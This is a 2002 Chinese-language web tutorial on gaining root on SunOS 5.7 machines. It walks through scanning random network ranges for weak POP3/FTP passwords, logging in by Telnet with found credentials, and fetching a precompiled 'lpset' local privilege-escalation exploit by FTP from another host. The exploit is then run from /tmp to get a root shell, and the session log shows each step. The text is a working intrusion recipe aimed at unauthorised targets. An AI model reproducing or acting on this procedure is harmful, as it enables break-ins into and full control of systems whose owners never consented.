|
如何获得SUNOS的ROOT权限(初级篇)
|
|
来源:vittersafe.tk 作者:vitter 发布时间:2002-08-29
|
|
使用工具:流光IV,SecuCRT(在流光IV安装目录Other下) 1、用流光IV中的高级扫描扫描一个网段,为了加快速度就只选择POP3/FTP。 2、如果运气好,可以扫描到一个POP3或者FTP的密码(如果没有扫描到,就换一个网段试试)。通常UNIX的FTP和POP3帐号和SHELL帐号是一致的。 3、使用SecuCRT从Telnet登陆. SunOS 5.7 login: market Password: No directory! Logging in with home=/ Last login: Wed Jun 6 23:02:31 from xxx.xxx.xxx.xxx Sun Microsystems Inc. SunOS 5.7 Generic October 1998 $ 利用FTP将对应版本的溢出程序,这里的版本是5.7,在流光IV的安装目录下Exploit\local\Sun Sparc\5.7下编译好的程序上传。这里我们上传lpset,注意一定要上传到有写权限的目录例如/tmp。 $ cd /tmp $ ls dsnmpserv.mbx dsnmpservtrap.mbx dsserv.mbx errorlog.rumo ppa_file ps_data $ ftp xxx.xxx.xxx.xxx Connected to xxx.xxx.xxx.xxx 220 ProFTPD 1.2.0 Server Name (xxx.xxx.xxx.xxx:market): username 331 Password required for username. Password: 230 User username logged in. ftp> bin 200 Type set to I. ftp> get lpset 200 PORT command successful. 150 Opening BINARY mode data connection for lpset (26148 bytes). 226 Transfer complete. local: lpset remote: lpset 26148 bytes received in 1.7 seconds (14.78 Kbytes/s) ftp> quit 221 Goodbye. $ 上传成功。 首先将程序改为可以运行。 $ chmod 777 lpset 运行。注意前面的./,在UNIX中如果运行当前目录下的程序必须用./开始,除非在Path中设置。 $ ./lpset copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net/ /usr/bin/lpset for solaris 2.6 2.7 sparc FNS for files is not installed Cannot use this command in this environment Use: fncreate -t org command to install # 这里就得到了ROOT.
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
